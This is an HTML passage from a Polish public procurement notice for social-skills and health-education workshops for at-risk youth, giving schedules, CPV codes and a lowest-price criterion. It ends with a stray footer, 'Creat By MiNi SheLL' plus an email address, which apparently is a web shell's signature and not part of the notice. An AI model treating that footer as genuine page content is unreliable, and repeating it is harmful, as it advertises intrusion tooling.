II etap - grupa 15 osób -  termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r. Czas trwania zajęć - 2 godziny dydaktyczne 2 razy w tygodniu. Łącznie 128 godzin dydaktycznych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Podzadanie Nr 4 - Prowadzenie i organizacja zadań edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby  zagrożone wykluczeniem społecznym). Zamawiający wymaga, aby zajęcia prowadzone były w formie warsztatowej. Celem zajęć jest rozwój umiejętności społecznych. W ramach działania Zamawiający zaplanował tematy związane z:
a)	poszerzaniem wiedzy na temat współczesnych zagrożeń cywilizacyjnych, 
b)	edukacją w zakresie tematu antykoncepcji i świadomego planowania rodziny,
c)	zaburzeń odżywiania,
d)	 pierwszej pomocy, 
e)	zabiegów pielęgnacyjnych dla niemowląt.  
Przewidywane terminy realizacji usługi: 
I etap - grupa 15 osób - termin realizacji od 1 listopada 2011 do 31 grudnia 2011 r.
II etap - grupa 15 osób - termin realizacji od 1 czerwca 2012 r. do 31 lipca 2012 r. 
Czas trwania zajęć - 2 godziny dydaktyczne 1 raz w tygodniu). Łącznie 64 godziny dydaktyczne zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com